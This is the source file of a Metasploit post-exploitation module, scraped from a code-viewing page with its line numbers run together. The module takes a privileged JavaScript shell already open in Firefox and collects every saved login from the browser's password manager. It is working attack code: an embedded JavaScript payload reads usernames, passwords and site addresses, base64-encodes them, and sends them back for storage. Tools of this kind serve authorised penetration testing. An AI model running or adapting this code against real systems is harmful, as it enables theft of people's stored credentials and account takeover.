Path: blob/master/modules/post/firefox/gather/passwords.rb
19515 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'json'67class MetasploitModule < Msf::Post8include Msf::Payload::Firefox9include Msf::Exploit::Remote::FirefoxPrivilegeEscalation1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Firefox Gather Passwords from Privileged JavaScript Shell',16'Description' => %q{17This module allows collection of passwords from a Firefox Privileged JavaScript Shell.18},19'License' => MSF_LICENSE,20'Author' => [ 'joev' ],21'DisclosureDate' => '2014-04-11',22'Notes' => {23'Stability' => [CRASH_SAFE],24'SideEffects' => [],25'Reliability' => []26}27)28)2930register_options([31OptInt.new('TIMEOUT', [true, 'Maximum time (seconds) to wait for a response', 90])32])33end3435def run36results = js_exec(js_payload)37if results.present?38begin39passwords = JSON.parse(results)40passwords.each do |entry|41entry.each_key { |k| entry[k] = Rex::Text.decode_base64(entry[k]) }42end4344if !passwords.empty?45file = store_loot('firefox.passwords.json', 'text/json', rhost, passwords.to_json)46print_good("Saved #{passwords.length} passwords to #{file}")47else48print_warning('No passwords were found in Firefox.')49end50rescue JSON::ParserError51print_warning(results)52end53end54end5556def js_payload57%|58(function(send){59try {60var manager = Components61.classes["@mozilla.org/login-manager;1"]62.getService(Components.interfaces.nsILoginManager);63var logins = manager.getAllLogins();64var passwords = [];65var b64 = Components.utils.import("resource://gre/modules/Services.jsm").btoa;66var fields = ['password', 'passwordField', 'username', 'usernameField',67'httpRealm', 'formSubmitURL', 'hostname'];6869var sanitize = function(passwdObj) {70var sanitized = { };71for (var i in fields) {72sanitized[fields[i]] = b64(passwdObj[fields[i]]);73}74return sanitized;75}7677// Find user from returned array of nsILoginInfo objects78for (var i = 0; i < logins.length; i++) {79passwords.push(sanitize(logins[i]));80}8182send(JSON.stringify(passwords));83} catch (e) {84send(e);85}86})(this.send);87|.strip88end89end909192